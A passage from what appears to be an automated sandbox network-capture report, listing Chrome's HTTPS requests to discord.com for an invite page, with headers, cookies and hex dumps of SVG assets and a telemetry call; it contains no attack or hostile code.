                                                                          Data Ascii: ATED_ICON","WELCOME_SCREEN_ENABLED","THREE_DAY_THREAD_ARCHIVE","AUTO_MODERATION"],"verification_level":2,"vanity_url_code":"boringsecurity","nsfw_level":0,"nsfw":false,"premium_subscription_count":24},"guild_id":"933253328794689546","channel":{"id":"93325
                                                                          2023-12-10 16:45:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          368192.168.2.550105162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1036OUTGET /assets/7442b576347c1d02886f.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
                                                                          2023-12-10 16:45:25 UTC956INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 34 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 39 35 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 36 65 64 38 33 37 34 62 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:24 GMTContent-Type: image/svg+xmlContent-Length: 395Connection: closeCF-Ray: 8336f546ed8374be-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC395INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 32 2e 39 39 33 32 20 37 2e 34 39 37 32 37 43 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 37 2e 34 39 37 32 37 20 35 2e 34 38 30 37 33 20 37 2e 34 39 37 32 37 20 32 2e 39 39 33 32 43 37 2e 34 39 37 32 37 20 31 2e 38 34 34 32 31 20 37 2e 30 36 37 30 34 20 30 2e 37 39 35 37 30 38 20 36 2e 33 35 38 38 39 20 30 43 39 2e 35 30 35 39 35 20 30 2e 31 38 38 33 32 33 20 31 32 20 32 2e 38 30 30 31 38 20 31 32 20 35 2e 39 39 34 35 36 43 31 32 20 39 2e
                                                                          Data Ascii: <svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          369192.168.2.550106162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC1789OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 391
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=vy2SOoFIazLkclN_hzdgnccOM4x55DI6.XQfVv9iLQw-1702226724746-0-604800000
                                                                          2023-12-10 16:45:24 UTC391OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 69 6e 76 69 74 65 5f 6f 70 65 6e 65 64 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 33 33 34 31 2c 22 69 6e 76 69 74 65 5f 63 6f 64 65 22 3a 22 62 6f 72 69 6e 67 73 65 63 75 72 69 74 79 22 2c 22 6c 6f 61 64 5f 74 69 6d 65 22 3a 31 38 36 32 39 2c 22 63 6c 69 65 6e 74 5f 70 65 72 66 6f 72 6d 61 6e 63 65 5f 6d 65 6d 6f 72 79 22 3a 30 2c 22 61 63 63 65 73 73 69 62 69 6c 69 74 79 5f 66 65 61 74 75 72 65 73 22 3a 31 32 38 2c 22 72 65 6e 64 65 72 65 64 5f 6c 6f 63 61 6c 65 22 3a 22 65 6e 2d 55 53 22 2c 22 75 70 74 69 6d 65 5f 61 70 70 22 3a 31 38 2c 22 63 6c 69 65 6e 74 5f 72 74 63 5f 73 74 61 74 65
                                                                          Data Ascii: {"events":[{"type":"invite_opened","properties":{"client_track_timestamp":1702226723341,"invite_code":"boringsecurity","load_time":18629,"client_performance_memory":0,"accessibility_features":128,"rendered_locale":"en-US","uptime_app":18,"client_rtc_state
                                                                          2023-12-10 16:45:25 UTC825INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:25 GMTConnection: closevary: Origin, Access-Control-Request-Method, Access-Control-Request-Headersaccess-control-allow-origin: https://discord.comVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          370192.168.2.550107162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC783OUTGET /assets/321a07cbc6f5919dbce9.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
                                                                          2023-12-10 16:45:25 UTC1117INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 37 63 62 63 66 37 34 36 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 139Connection: closeCF-Ray: 8336f547cbcf746e-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC139INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 20 38 22 20 77 69 64 74 68 3d 22 38 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 63 69 72 63 6c 65 20 63 78 3d 22 34 22 20 63 79 3d 22 34 22 20 72 3d 22 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                          Data Ascii: <svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          371192.168.2.550108162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC783OUTGET /assets/a826e445dff97cf15335.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
                                                                          2023-12-10 16:45:25 UTC1114INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 30 35 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 37 64 65 38 33 37 34 37 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 2058Connection: closeCF-Ray: 8336f547de837473-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-C
                                                                          2023-12-10 16:45:25 UTC255INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 35 20 34 35 22 20 78 6d 6c 3a 73 70 61 63 65 3d 22 70 72 65 73 65 72 76 65 22 3e 0a 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 61 22 20 63 6c 69 70 50 61 74 68 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 30 20 33 36 68 33 36 56 30 48 30 76 33 36 5a 22 2f 3e 0a 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 3c 6d 61 73 6b 20 69 64 3d 22 62 22 3e 0a 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 20 78 3d 22 30 22 20 79 3d 22 30 22 20 77 69 64 74 68 3d
                                                                          Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve"> <defs> <clipPath id="a" clipPathUnits="userSpaceOnUse"> <path d="M0 36h36V0H0v36Z"/> </clipPath> <mask id="b"> <g> <rect x="0" y="0" width=
                                                                          2023-12-10 16:45:25 UTC1369INData Raw: 22 31 30 30 22 20 68 65 69 67 68 74 3d 22 31 30 30 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 31 2e 37 30 38 20 32 39 2e 38 34 39 61 31 2e 32 39 36 20 31 2e 32 39 36 20 30 20 31 20 30 2d 32 2e 35 39 31 2d 2e 30 30 31 20 31 2e 32 39 36 20 31 2e 32 39 36 20 30 20 30 20 30 20 32 2e 35 39 31 20 30 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 3c 2f 6d 61 73 6b 3e 0a 20 20 3c 2f 64 65 66 73 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 6d 61 74 72 69 78 28 31 2e 32 35 20 30 20 30 20 2d 31 2e 32 35 20 30 20 34 35 29 22 20 6d
                                                                          Data Ascii: "100" height="100" fill="white" /> <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/> </g> </mask> </defs> <g> <g> <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" m
                                                                          2023-12-10 16:45:25 UTC434INData Raw: 31 2e 35 34 39 2d 2e 31 30 36 20 33 2e 33 35 32 2d 2e 31 34 32 20 31 2e 35 35 34 2d 2e 30 32 20 31 2e 34 36 33 2e 35 36 20 31 2e 36 36 34 20 31 2e 36 32 31 2e 30 34 32 2e 32 32 33 2e 37 37 36 2d 31 2e 36 31 36 20 32 2e 30 36 2d 31 2e 38 30 37 20 33 2e 35 35 35 2d 2e 35 33 20 31 2e 38 38 2d 31 2e 39 34 20 30 2d 32 2e 32 36 2d 2e 39 2d 2e 31 35 35 2d 32 2e 30 31 2d 2e 33 32 2d 33 2e 39 33 36 2d 2e 31 35 36 2d 32 2e 35 32 2e 32 31 32 2d 33 2e 37 36 38 20 31 2e 35 32 38 2d 33 2e 31 34 20 32 2e 37 34 34 22 20 66 69 6c 6c 3d 22 77 68 69 74 65 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 31 32 2e 35 30 32 20 31 39 2e 33 37 35 63 2e 30 34 34 2d 2e 36 32 35 2e 35
                                                                          Data Ascii: 1.549-.106 3.352-.142 1.554-.02 1.463.56 1.664 1.621.042.223.776-1.616 2.06-1.807 3.555-.53 1.88-1.94 0-2.26-.9-.155-2.01-.32-3.936-.156-2.52.212-3.768 1.528-3.14 2.744" fill="white"/> </g> <g> <path d="M12.502 19.375c.044-.625.5


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          372192.168.2.550109162.159.138.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:24 UTC783OUTGET /assets/1f3e315f020ed5635dc1.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=5Oj0OnZQ0lRz.YU1RxxIZMDBy.vsd66.lBMtqZ.Wfzo-1702226724507-0-604800000
                                                                          2023-12-10 16:45:25 UTC1111INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 37 66 62 32 66 37 34 37 64 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 180Connection: closeCF-Ray: 8336f547fb2f747d-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
                                                                          2023-12-10 16:45:25 UTC180INData Raw: 3c 73 76 67 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 68 65 69 67 68 74 3d 22 39 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 36 20 39 22 20 77 69 64 74 68 3d 22 36 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 6d 30 20 32 2e 38 33 39 31 32 76 33 2e 33 32 31 37 36 6c 33 20 32 2e 38 33 39 31 32 20 33 2d 32 2e 38 33 39 31 32 76 2d 33 2e 33 32 31 37 36 6c 2d 33 2d 32 2e 38 33 39 31 32 7a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 2f 73 76 67 3e
                                                                          Data Ascii: <svg fill="none" height="9" viewBox="0 0 6 9" width="6" xmlns="http://www.w3.org/2000/svg"><path d="m0 2.83912v3.32176l3 2.83912 3-2.83912v-3.32176l-3-2.83912z" fill="#fff"/></svg>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          373192.168.2.550110162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:25 UTC1036OUTGET /assets/3205da2e8f78633583d0.svg HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=uymERFs01dlt38UGn5iqWw3JHnSCmXqgawSYEADAVao-1702226724003-0-604800000
                                                                          2023-12-10 16:45:25 UTC1119INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 36 38 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 39 39 63 66 33 64 61 65 35 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 43 61 63 68 65 2d 43 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:25 GMTContent-Type: image/svg+xmlContent-Length: 688Connection: closeCF-Ray: 8336f5499cf3dae5-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.comCache-Co
